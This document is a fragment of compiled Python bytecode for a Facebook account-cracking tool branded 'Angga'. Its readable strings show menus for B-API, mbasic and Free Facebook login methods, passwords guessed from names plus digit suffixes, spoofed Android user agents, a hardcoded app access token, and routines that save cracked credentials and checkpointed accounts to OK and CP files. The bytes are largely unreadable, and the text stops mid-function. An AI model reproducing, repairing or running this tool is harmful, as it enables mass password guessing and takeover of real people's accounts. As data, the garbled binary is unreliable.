publics3\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Total id : \x1b[0;92m%s\x1b[0;96m(\x12\x00\x00\x00R2\x00\x00\x00RE\x00\x00\x00R9\x00\x00\x00R:\x00\x00\x00R1\x00\x00\x00t\x03\x00\x00\x00intt\x05\x00\x00\x00inputt\x05\x00\x00\x00rangeR5\x00\x00\x00R-\x00\x00\x00R.\x00\x00\x00R6\x00\x00\x00t\x01\x00\x00\x00nRY\x00\x00\x00RX\x00\x00\x00RZ\x00\x00\x00R4\x00\x00\x00RN\x00\x00\x00(\x06\x00\x00\x00t\x0b\x00\x00\x00tanya_Totalt\x01\x00\x00\x00tR[\x00\x00\x00R\\\x00\x00\x00R]\x00\x00\x00R;\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>RJ\x00\x00\x00\xe9\x00\x00\x00s&\x00\x00\x00\x00\x02\x03\x01\x19\x01\r\x01\x0e\x01\x03\x01\x16\x01\x03\x00\n\x01\x13\x01\n\x01\x10\x01\x03\x01*\x01\n\x01\x17\x01\x1d\x01\r\x01\r\x01c\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sC\x01\x00\x00d\x01\x00GHd\x02\x00GHd\x03\x00GHd\x04\x00GHt\x00\x00d\x05\x00\x83\x01\x00}\x00\x00|\x00\x00d\x06\x00k\x02\x00r6\x00t\x01\x00\x83\x00\x00\x01n\t\x01|\x00\x00d\x07\x00k\x02\x00r\x8c\x00t\x00\x00d\x08\x00\x83\x01\x00}\x01\x00|\x01\x00d\t\x00k\x02\x00rd\x00t\x02\x00\x83\x00\x00\x01n\x00\x00d\n\x00GHt\x03\x00d\x0b\x00\x83\x01\x00j\x04\x00t\x05\x00t\x06\x00\x83\x02\x00\x01t\x07\x00d\x0c\x00\x83\x01\x00\x01n\xb3\x00|\x00\x00d\r\x00k\x02\x00r\xe2\x00t\x00\x00d\x0e\x00\x83\x01\x00}\x01\x00|\x01\x00d\t\x00k\x02\x00r\xba\x00t\x02\x00\x83\x00\x00\x01n\x00\x00d\n\x00GHt\x03\x00d\x0b\x00\x83\x01\x00j\x04\x00t\x08\x00t\x06\x00\x83\x02\x00\x01t\x07\x00d\x0c\x00\x83\x01\x00\x01n]\x00|\x00\x00d\x0f\x00k\x02\x00r8\x01t\x00\x00d\x0e\x00\x83\x01\x00}\x01\x00|\x01\x00d\t\x00k\x02\x00r\x10\x01t\x02\x00\x83\x00\x00\x01n\x00\x00d\n\x00GHt\x03\x00d\x0b\x00\x83\x01\x00j\x04\x00t\t\x00t\x06\x00\x83\x02\x00\x01t\x07\x00d\x0c\x00\x83\x01\x00\x01n\x07\x00t\x01\x00\x83\x00\x00\x01d\x00\x00S(\x10\x00\x00\x00NsM\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Choose Crack Methode [ \x1b[1;92mRecommended B-API \x1b[1;97m]s[\x00\x00\x00\x1b[1;96m[\x1b[1;93m1\x1b[1;96m] 
\x1b[1;92mAngga \x1b[1;96m\xe2\x84\xa2 \x1b[1;97mB-API\x1b[1;97m [ \x1b[1;95mFast \x1b[1;97m]s]\x00\x00\x00\x1b[1;96m[\x1b[1;93m2\x1b[1;96m] \x1b[1;92mAngga \x1b[1;96m\xe2\x84\xa2 \x1b[1;97mM-Basic\x1b[1;97m [ \x1b[1;95mFast \x1b[1;97m]se\x00\x00\x00\x1b[1;96m[\x1b[1;93m3\x1b[1;96m] \x1b[1;92mAngga \x1b[1;96m\xe2\x84\xa2 \x1b[1;97mFree Facebook\x1b[1;97m [ \x1b[1;95mNormal \x1b[1;97m]sA\x00\x00\x00\x1b[1;96m[\x1b[1;93m+\x1b[1;96m] \x1b[1;92mAngga \x1b[1;96m\xe2\x84\xa2 \x1b[1;97mOption : R*\x00\x00\x00R=\x00\x00\x00s^\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Do You Choose Manual Passwors? y/t\x1b[1;97m [ \x1b[1;92mDefault: t\x1b[1;97m ] : t\x01\x00\x00\x00yRA\x00\x00\x00i\x1e\x00\x00\x00s\x0b\x00\x00\x00Program EndR>\x00\x00\x00s]\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Do You Choose Manual passwords? y/t\x1b[1;97m [ \x1b[1;92mDefault: t\x1b[1;97m ] R?\x00\x00\x00(\n\x00\x00\x00R5\x00\x00\x00R3\x00\x00\x00t\x06\x00\x00\x00manualR\x00\x00\x00\x00t\x03\x00\x00\x00mapt\x04\x00\x00\x00bapiRX\x00\x00\x00R1\x00\x00\x00t\x06\x00\x00\x00mbasict\x06\x00\x00\x00mobile(\x02\x00\x00\x00RH\x00\x00\x00t\x03\x00\x00\x00ask(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>RH\x00\x00\x00\xfe\x00\x00\x00s:\x00\x00\x00\x00\x01\x05\x01\x05\x01\x05\x01\x05\x01\x0c\x01\x0c\x01\n\x01\x0c\x01\x0c\x01\x0c\x01\n\x01\x05\x01\x16\x01\r\x01\x0c\x01\x0c\x01\x0c\x01\n\x01\x05\x01\x16\x01\r\x01\x0c\x01\x0c\x01\x0c\x01\n\x01\x05\x01\x16\x01\r\x02c\x02\x00\x00\x00\t\x00\x00\x00\x0b\x00\x00\x00C\x00\x00\x00s\x01\x01\x00\x00y\xcf\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x02\x00t\x02\x00j\x03\x00\x83\x00\x00\x8f\xa8\x00}\x03\x00|\x03\x00j\x04\x00d\x03\x00|\x00\x00|\x02\x00f\x02\x00\x16\x83\x01\x00j\x05\x00\x83\x00\x00d\x04\x00\x19}\x04\x00|\x04\x00j\x06\x00d\x05\x00\x83\x01\x00\\\x03\x00}\x05\x00}\x06\x00}\x07\x00t\x07\x00|\x05\x00\x19}\x05\x00d\x06\x00|\x00\x00|\x01\x00|\x06\x00|\x05\x00|\x07\x00f\x05\x00\x16GHt\x08\x00j\t\x00d\x0
7\x00|\x00\x00|\x01\x00f\x02\x00\x16\x83\x01\x00\x01t\x00\x00d\x08\x00t\n\x00\x16d\t\x00\x83\x02\x00j\x0b\x00d\n\x00|\x00\x00|\x01\x00|\x06\x00|\x05\x00|\x07\x00f\x05\x00\x16\x83\x01\x00\x01Wd\x00\x00QXWn+\x00\x04t\x0c\x00k\n\x00r\xf6\x00\x01}\x08\x00\x01d\x0b\x00}\x06\x00d\x0b\x00}\x05\x00d\x0b\x00}\x07\x00n\x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S(\x0c\x00\x00\x00Ns\t\x00\x00\x00login.txtR)\x00\x00\x00s-\x00\x00\x00https://graph.facebook.com/%s?access_token=%st\x08\x00\x00\x00birthdayt\x01\x00\x00\x00/s(\x00\x00\x00\r\x1b[0;96m[ANGGA_CP] %s|%s|%s %s %s\x1b[0;96ms\x05\x00\x00\x00%s|%ss\t\x00\x00\x00CP/%s.txtt\x01\x00\x00\x00as\x12\x00\x00\x00 + %s|%s|%s %s %s\nRA\x00\x00\x00(\r\x00\x00\x00R2\x00\x00\x00RE\x00\x00\x00R-\x00\x00\x00t\x07\x00\x00\x00SessionR.\x00\x00\x00R6\x00\x00\x00t\x05\x00\x00\x00splitt\t\x00\x00\x00bulan_ttlt\x02\x00\x00\x00cpRZ\x00\x00\x00t\x07\x00\x00\x00tanggalR\x12\x00\x00\x00R4\x00\x00\x00(\t\x00\x00\x00R]\x00\x00\x00t\x02\x00\x00\x00pwR9\x00\x00\x00t\x03\x00\x00\x00sest\x03\x00\x00\x00ttlt\x05\x00\x00\x00montht\x03\x00\x00\x00dayt\x04\x00\x00\x00yearR:\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\n\x00\x00\x00cek_ttl_cp\x1e\x01\x00\x00s\x1e\x00\x00\x00\x00\x01\x03\x01\x15\x01\x0f\x01#\x01\x18\x01\n\x01\x18\x01\x17\x017\x01\x0f\x01\x06\x01\x06\x01\t\x01\x03\x00c\x01\x00\x00\x00\t\x00\x00\x00\x07\x00\x00\x00C\x00\x00\x00s2\x03\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x01\x00WnG\x00\x04t\x02\x00k\n\x00rb\x00\x01\x01\x01d\x03\x00}\x01\x00d\x04\x00}\x01\x00d\x05\x00}\x01\x00d\x06\x00}\x01\x00d\x07\x00}\x01\x00d\x08\x00}\x01\x00d\t\x00}\x01\x00d\n\x00}\x01\x00d\x0b\x00}\x01\x00n\x01\x00Xt\x03\x00j\x04\x00j\x05\x00d\x0c\x00t\x06\x00t\x07\x00t\x08\x00\x83\x01\x00t\x07\x00t\t\x00\x83\x01\x00t\x07\x00t\n\x00\x83\x01\x00f\x04\x00\x16\x83\x01\x00\x01t\x03\x00j\x04\x00j\x0b\x00\x83\x00\x00\x01|\x00\x00j\x0c\x00d\r\x00\x83\x01\x00\\\x02\x00}\x02\x00}\x03\x00t\x07\x00|\x03\x00\x83\x01\
x00d\x0e\x00k\x05\x00r\xea\x00|\x03\x00|\x03\x00d\x0f\x00\x17|\x03\x00d\x10\x00\x17|\x03\x00d\x11\x00\x17g\x04\x00}\x04\x00n{\x00t\x07\x00|\x03\x00\x83\x01\x00d\x12\x00k\x01\x00r\x1a\x01|\x03\x00d\x13\x00\x17|\x03\x00d\x14\x00\x17|\x03\x00d\x15\x00\x17g\x03\x00}\x04\x00nK\x00t\x07\x00|\x03\x00\x83\x01\x00d\x16\x00k\x01\x00rJ\x01|\x03\x00d\x17\x00\x17|\x03\x00d\x10\x00\x17|\x03\x00d\x11\x00\x17g\x03\x00}\x04\x00n\x1b\x00|\x03\x00d\x11\x00\x17|\x03\x00d\x14\x00\x17|\x03\x00d\x15\x00\x17g\x03\x00}\x04\x00y\xbf\x01x\xae\x01|\x04\x00D]\xa6\x01}\x05\x00|\x05\x00j\r\x00\x83\x00\x00}\x05\x00t\x0e\x00j\x0f\x00\x83\x00\x00}\x06\x00i\x08\x00t\x10\x00t\x11\x00j\x12\x00d\x18\x00d\x19\x00\x83\x02\x00\x83\x01\x00d\x1a\x006t\x10\x00t\x11\x00j\x12\x00d\x1b\x00d\x1c\x00\x83\x02\x00\x83\x01\x00d\x1d\x006t\x10\x00t\x11\x00j\x12\x00d\x1b\x00d\x1c\x00\x83\x02\x00\x83\x01\x00d\x1e\x006d\x1f\x00d \x006d!\x00d"\x006|\x01\x00d#\x006d$\x00d%\x006d&\x00d\'\x006}\x07\x00|\x06\x00j\x13\x00d(\x00t\x10\x00|\x02\x00\x83\x01\x00\x17d)\x00\x17t\x10\x00|\x05\x00\x83\x01\x00\x17d*\x00\x17d+\x00|\x07\x00\x83\x01\x01}\x08\x00d,\x00|\x08\x00j\x14\x00k\x06\x00r\xae\x02d-\x00|\x08\x00j\x14\x00k\x06\x00r\xae\x02d.\x00|\x02\x00|\x05\x00|\x08\x00j\x15\x00\x83\x00\x00d/\x00\x19f\x03\x00\x16GHt\t\x00j\x16\x00d0\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01t\x00\x00d1\x00t\x17\x00\x16d2\x00\x83\x02\x00j\x05\x00d3\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01Pqo\x01qo\x01d4\x00|\x08\x00j\x15\x00\x83\x00\x00d5\x00\x19k\x06\x00ro\x01d6\x00|\x02\x00|\x05\x00f\x02\x00\x16GHt\n\x00j\x16\x00d0\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01t\x00\x00d7\x00t\x17\x00\x16d2\x00\x83\x02\x00j\x05\x00d3\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01Pqo\x01qo\x01qo\x01Wt\x06\x00d8\x007a\x06\x00Wn\x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S(9\x00\x00\x00Ns\x03\x00\x00\x00.uaR)\x00\x00\x00s\x8d\x00\x00\x00Mozilla/5.0 (Linux; U; Android 4.1.2; de-de; GT-I8190 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) 
Version/4.0 Mobile Safari/534.30;]s\x86\x00\x00\x00Mozilla/5.0 (Linux; Android 5.1; A1601 Build/LMY47I) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.36;]s\x8f\x00\x00\x00Mozilla/5.0 (Linux; Android 6.0; MYA-L22 Build/HUAWEIMYA-L22) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36;]s\xa5\x00\x00\x00Mozilla/5.0 (Linux; Android 7.0; SAMSUNG SM-G610M Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/7.4 Chrome/59.0.3071.125 Mobile Safari/537.36;]s\x8a\x00\x00\x00Mozilla/5.0 (Linux; Android 7.1; vivo 1716 Build/N2G47H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.98 Mobile Safari/537.36;]s\x96\x00\x00\x00Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G950U) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/10.2 Chrome/71.0.3578.99 Mobile Safari/537.36;]s\xcc\x00\x00\x00Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]s\x1f\x01\x00\x00Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/323.0.0.46.119;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]s|\x00\x00\x00NokiaC3-00/5.0 (07.20) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420;]sO\x00\x00\x00\r\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4 \x1b[0;92mCRACK \x1b[0;93m\xe2\x80\xa2\xe2\x80\xa2>\x1b[0;96m %s/%s \xe2\x80\xa2> [OK:-%s]-[CP:-%s] s\x03\x00\x00\x00<=>i\x06\x00\x00\x00R=\x00\x00\x00R$\x00\x00\x00t\x03\x00\x00\x00123i\x02\x00\x00\x00R?\x00\x00\x00t\x04\x00\x00\x001234t\x05\x00\x00\x0012345i\x03\x00\x00\x00R>\x00\x00\x00g\x00\x00\x00\x00\xd0\x12sAg\x00\x00\x00\x008\x9c|As\x19\x00\x00\x00x-fb-connection-bandwidthi 
N\x00\x00i@\x9c\x00\x00s\x0c\x00\x00\x00x-fb-sim-hnis\x0c\x00\x00\x00x-fb-net-hnit\t\x00\x00\x00EXCELLENTs\x17\x00\x00\x00x-fb-connection-qualitys!\x00\x00\x00cell.CTRadioAccessTechnologyHSDPAs\x14\x00\x00\x00x-fb-connection-types\n\x00\x00\x00user-agents!\x00\x00\x00application/x-www-form-urlencodeds\x0c\x00\x00\x00content-typet\x05\x00\x00\x00Ligers\x10\x00\x00\x00x-fb-http-engines?\x00\x00\x00https://b-api.facebook.com/method/auth.login?format=json&email=s\n\x00\x00\x00&password=s\xae\x01\x00\x00&credentials_type=device_based_login_password&generate_session_cookies=1&error_detail_type=button_with_disabled&source=device_based_login&meta_inf_fbmeta=%20¤tly_logged_in_userid=0&method=GET&locale=en_US&client_country_code=US&fb_api_caller_class=com.facebook.fos.headersv2.fb4aorca.HeadersV2ConfigFetchRequestHandler&access_token=350685531728|62f8ce9f74b12f84c123cc23437a4a32&fb_api_req_friendly_name=authenticate&cpl=truet\x07\x00\x00\x00headerst\x0b\x00\x00\x00session_keyt\x04\x00\x00\x00EAAAs"\x00\x00\x00\r\x1b[0;92m[ANGGA_OK] %s|%s|%s\x1b[0;97mt\x0c\x00\x00\x00access_tokens\x05\x00\x00\x00%s|%ss\t\x00\x00\x00OK/%s.txtRm\x00\x00\x00s\t\x00\x00\x00 + %s|%s\ns\x10\x00\x00\x00www.facebook.comt\t\x00\x00\x00error_msgs\'\x00\x00\x00\r\x1b[0;96m[ANGGA_CP] %s|%s\x1b[0;96m 
s\t\x00\x00\x00CP/%s.txti\x01\x00\x00\x00(\x18\x00\x00\x00R2\x00\x00\x00RE\x00\x00\x00R:\x00\x00\x00R\x10\x00\x00\x00R\x11\x00\x00\x00R\x12\x00\x00\x00t\x04\x00\x00\x00loopRN\x00\x00\x00RX\x00\x00\x00t\x02\x00\x00\x00okRq\x00\x00\x00R\x13\x00\x00\x00Ro\x00\x00\x00R7\x00\x00\x00R-\x00\x00\x00Rn\x00\x00\x00t\x03\x00\x00\x00strt\x06\x00\x00\x00randomt\x07\x00\x00\x00randintR.\x00\x00\x00t\x04\x00\x00\x00textR6\x00\x00\x00RZ\x00\x00\x00t\x07\x00\x00\x00tBilall(\t\x00\x00\x00t\x04\x00\x00\x00usert\x02\x00\x00\x00uaR]\x00\x00\x00R+\x00\x00\x00t\x03\x00\x00\x00pwxRs\x00\x00\x00Rt\x00\x00\x00t\x08\x00\x00\x00headers_t\x04\x00\x00\x00send(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Rg\x00\x00\x00.\x01\x00\x00sX\x00\x00\x00\x00\x01\x03\x01\x19\x01\r\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\n\x02\t\x01)\x01\r\x01\x15\x01\x12\x01!\x01\x12\x01\x1e\x01\x12\x01\x1e\x02\x1b\x01\x03\x01\r\x01\x0c\x01\x0c\x01t\x011\x01\x1e\x01\x1c\x01\x17\x01$\x01\x01\x01\x06\x01\x16\x01\x0f\x01\x17\x01$\x01\x01\x01\n\x02\x0e\x01\x03\x01c\x01\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00C\x00\x00\x00s\xfb\x03\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x01\x00Wn\x1d\x00\x04t\x02\x00k\n\x00r8\x00\x01\x01\x01d\x03\x00}\x01\x00d\x04\x00}\x01\x00n\x01\x00Xt\x03\x00j\x04\x00j\x05\x00d\x05\x00t\x06\x00t\x07\x00t\x08\x00\x83\x01\x00t\x07\x00t\t\x00\x83\x01\x00t\x07\x00t\n\x00\x83\x01\x00f\x04\x00\x16\x83\x01\x00\x01t\x03\x00j\x04\x00j\x0b\x00\x83\x00\x00\x01|\x00\x00j\x0c\x00d\x06\x00\x83\x01\x00\\\x02\x00}\x02\x00}\x03\x00t\x07\x00|\x03\x00\x83\x01\x00d\x07\x00k\x05\x00r\xc0\x00|\x03\x00|\x03\x00d\x08\x00\x17|\x03\x00d\t\x00\x17|\x03\x00d\n\x00\x17g\x04\x00}\x04\x00nm\x00t\x07\x00|\x03\x00\x83\x01\x00d\x0b\x00k\x01\x00r\xf0\x00|\x03\x00d\x08\x00\x17|\x03\x00d\t\x00\x17|\x03\x00d\n\x00\x17g\x03\x00}\x04\x00n=\x00t\x07\x00|\x03\x00\x83\x01\x00d\x0c\x00k\x01\x00r\x19\x01|\x03\x00d\x08\x00\x17|\x03\x00d\n\x00\x17g\x02\x00}\x04\x00
n\x14\x00|\x03\x00d\x08\x00\x17|\x03\x00d\n\x00\x17g\x02\x00}\x04\x00y\xc0\x02x\xaf\x02|\x04\x00D]\xa7\x02}\x05\x00i\x00\x00}\x06\x00|\x05\x00j\r\x00\x83\x00\x00}\x05\x00t\x0e\x00j\x0f\x00\x83\x00\x00}\x07\x00|\x07\x00j\x10\x00j\x11\x00i\n\x00d\r\x00d\x0e\x006d\x0f\x00d\x10\x006d\x11\x00d\x12\x006d\x13\x00d\x14\x006|\x01\x00d\x15\x006d\x16\x00d\x17\x006d\x18\x00d\x19\x006d\x1a\x00d\x1b\x006d\x1c\x00d\x1d\x006d\x1e\x00d\x1f\x006\x83\x01\x00\x01|\x07\x00j\x12\x00d \x00\x83\x01\x00j\x13\x00}\x08\x00t\x14\x00|\x08\x00d!\x00\x83\x02\x00}\t\x00d"\x00d#\x00d$\x00d%\x00d&\x00d\'\x00d(\x00g\x07\x00}\n\x00xc\x00|\t\x00d)\x00\x83\x01\x00D]U\x00}\x0b\x00yE\x00|\x0b\x00j\x12\x00d*\x00\x83\x01\x00|\n\x00k\x06\x00rA\x02|\x06\x00j\x11\x00i\x01\x00|\x0b\x00j\x12\x00d+\x00\x83\x01\x00|\x0b\x00j\x12\x00d*\x00\x83\x01\x006\x83\x01\x00\x01n\x03\x00w\xfa\x01Wq\xfa\x01\x01\x01\x01q\xfa\x01Xq\xfa\x01W|\x06\x00j\x11\x00i\x0b\x00|\x02\x00d,\x006|\x05\x00d-\x006d.\x00d/\x006d.\x00d0\x006d.\x00d1\x006d.\x00d2\x006d.\x00d3\x006d4\x00d5\x006d4\x00d6\x006d4\x00d7\x006d8\x00d9\x006\x83\x01\x00\x01|\x07\x00j\x15\x00d:\x00d;\x00|\x06\x00\x83\x01\x01}\x0c\x00d<\x00|\x07\x00j\x16\x00j\x17\x00\x83\x00\x00j\x18\x00\x83\x00\x00k\x06\x00rr\x03d=\x00j\x19\x00g\x00\x00|\x07\x00j\x16\x00j\x17\x00\x83\x00\x00j\x1a\x00\x83\x00\x00D]\x1c\x00\\\x02\x00}\r\x00}\x0e\x00d>\x00|\r\x00|\x0e\x00f\x02\x00\x16^\x02\x00q\xf9\x02\x83\x01\x00}\x0f\x00d?\x00|\x02\x00|\x05\x00|\x0f\x00f\x03\x00\x16GHt\t\x00j\x1b\x00d@\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01t\x00\x00dA\x00t\x1c\x00\x16dB\x00\x83\x02\x00j\x05\x00dC\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01Pq7\x01q7\x01dD\x00|\x07\x00j\x16\x00j\x17\x00\x83\x00\x00j\x18\x00\x83\x00\x00k\x06\x00r7\x01dE\x00|\x02\x00|\x05\x00f\x02\x00\x16GHt\n\x00j\x1b\x00d@\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01t\x00\x00dF\x00t\x1c\x00\x16dB\x00\x83\x02\x00j\x05\x00dC\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01Pq7\x01q7\x01q7\x01Wt\x06\x00dG\x007a\x06\x00Wn\
x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S(H\x00\x00\x00Ns\x03\x00\x00\x00.uaR)\x00\x00\x00s\xcb\x00\x00\x00Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]s\xec\x01\x00\x00Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/323.0.0.46.119;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;], Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/255.0.0.8.119;]sO\x00\x00\x00\r\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4 \x1b[0;92mCRACK \x1b[0;93m\xe2\x80\xa2\xe2\x80\xa2>\x1b[0;96m %s/%s \xe2\x80\xa2> [OK:-%s]-[CP:-%s] s\x03\x00\x00\x00<=>i\x06\x00\x00\x00Rz\x00\x00\x00R{\x00\x00\x00R|\x00\x00\x00i\x02\x00\x00\x00i\x03\x00\x00\x00s\x1b\x00\x00\x00https://mbasic.facebook.comt\x06\x00\x00\x00origins#\x00\x00\x00id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7s\x0f\x00\x00\x00accept-languages\r\x00\x00\x00gzip, 
deflates\x0f\x00\x00\x00accept-encodingsU\x00\x00\x00text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8t\x06\x00\x00\x00accepts\n\x00\x00\x00user-agents\x13\x00\x00\x00mbasic.facebook.comt\x04\x00\x00\x00Hosts:\x00\x00\x00https://mbasic.facebook.com/login/?next&ref=dbl&fl&refid=8t\x07\x00\x00\x00referers\t\x00\x00\x00max-age=0s\r\x00\x00\x00cache-controlR=\x00\x00\x00s\x19\x00\x00\x00upgrade-insecure-requestss!\x00\x00\x00application/x-www-form-urlencodeds\x0c\x00\x00\x00content-types7\x00\x00\x00https://mbasic.facebook.com/login/?next&ref=dbl&refid=8s\x0b\x00\x00\x00html.parsert\x03\x00\x00\x00lsdt\x07\x00\x00\x00jazoestt\x04\x00\x00\x00m_tst\x02\x00\x00\x00lit\n\x00\x00\x00try_numbert\x12\x00\x00\x00unrecognized_triesR<\x00\x00\x00R_\x00\x00\x00R+\x00\x00\x00t\x05\x00\x00\x00valuet\x05\x00\x00\x00emailt\x04\x00\x00\x00passR*\x00\x00\x00t\x15\x00\x00\x00prefill_contact_pointt\x0e\x00\x00\x00prefill_sourcet\x0c\x00\x00\x00prefill_typet\x14\x00\x00\x00first_prefill_sourcet\x12\x00\x00\x00first_prefill_typet\x05\x00\x00\x00falset\x10\x00\x00\x00had_cp_prefilledt\x16\x00\x00\x00had_password_prefilledt\r\x00\x00\x00is_smart_lockt\x04\x00\x00\x00truet\x0c\x00\x00\x00_fb_noscriptsy\x00\x00\x00https://mbasic.facebook.com/login/device-based/regular/login/?refsrc=https%3A%2F%2Fmbasic.facebook.com%2F&lwv=100&refid=8RW\x00\x00\x00t\x06\x00\x00\x00c_usert\x01\x00\x00\x00;s\x05\x00\x00\x00%s=%ss"\x00\x00\x00\r\x1b[0;92m[ANGGA_OK] %s|%s|%s\x1b[0;95ms\x05\x00\x00\x00%s|%ss\t\x00\x00\x00OK/%s.txtRm\x00\x00\x00s\t\x00\x00\x00 + %s|%s\nt\n\x00\x00\x00checkpoints\'\x00\x00\x00\r\x1b[0;96m[ANGGA_CP] %s|%s\x1b[0;96m 
s\t\x00\x00\x00CP/%s.txti\x01\x00\x00\x00(\x1d\x00\x00\x00R2\x00\x00\x00RE\x00\x00\x00R:\x00\x00\x00R\x10\x00\x00\x00R\x11\x00\x00\x00R\x12\x00\x00\x00R\x84\x00\x00\x00RN\x00\x00\x00RX\x00\x00\x00R\x85\x00\x00\x00Rq\x00\x00\x00R\x13\x00\x00\x00Ro\x00\x00\x00R7\x00\x00\x00R-\x00\x00\x00Rn\x00\x00\x00R\x7f\x00\x00\x00t\x06\x00\x00\x00updateR.\x00\x00\x00R\x89\x00\x00\x00t\x06\x00\x00\x00parserR8\x00\x00\x00t\x07\x00\x00\x00cookiest\x08\x00\x00\x00get_dictt\x04\x00\x00\x00keyst\x04\x00\x00\x00joint\x05\x00\x00\x00itemsRZ\x00\x00\x00R\x8a\x00\x00\x00(\x10\x00\x00\x00R\x8b\x00\x00\x00R\x8c\x00\x00\x00R]\x00\x00\x00R+\x00\x00\x00R\x8d\x00\x00\x00Rs\x00\x00\x00t\x06\x00\x00\x00kwargsRt\x00\x00\x00t\x01\x00\x00\x00pt\x01\x00\x00\x00bt\x02\x00\x00\x00blR\\\x00\x00\x00t\x04\x00\x00\x00gaaat\x03\x00\x00\x00keyR\x9a\x00\x00\x00t\x04\x00\x00\x00kuki(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Rh\x00\x00\x00_\x01\x00\x00sd\x00\x00\x00\x00\x01\x03\x01\x19\x01\r\x01\x06\x01\n\x02\t\x01)\x01\r\x01\x15\x01\x12\x01!\x01\x12\x01\x1e\x01\x12\x01\x17\x02\x14\x01\x03\x01\r\x01\x06\x01\x0c\x01\x0c\x01V\x01\x12\x01\x0f\x01\x1b\x01\x13\x01\x03\x01\x15\x00)\x01\x07\x01\x03\x00\x08\x01Z\x01\x15\x01\x1b\x01A\x01\x12\x01\x17\x01$\x01\x01\x01\x06\x01\x1b\x01\x0f\x01\x17\x01$\x01\x01\x01\n\x02\x0e\x01\x03\x01c\x01\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00C\x00\x00\x00s\x01\x04\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x01\x00Wn#\x00\x04t\x02\x00k\n\x00r>\x00\x01\x01\x01d\x03\x00}\x01\x00d\x04\x00}\x01\x00d\x05\x00}\x01\x00n\x01\x00Xt\x03\x00j\x04\x00j\x05\x00d\x06\x00t\x06\x00t\x07\x00t\x08\x00\x83\x01\x00t\x07\x00t\t\x00\x83\x01\x00t\x07\x00t\n\x00\x83\x01\x00f\x04\x00\x16\x83\x01\x00\x01t\x03\x00j\x04\x00j\x0b\x00\x83\x00\x00\x01|\x00\x00j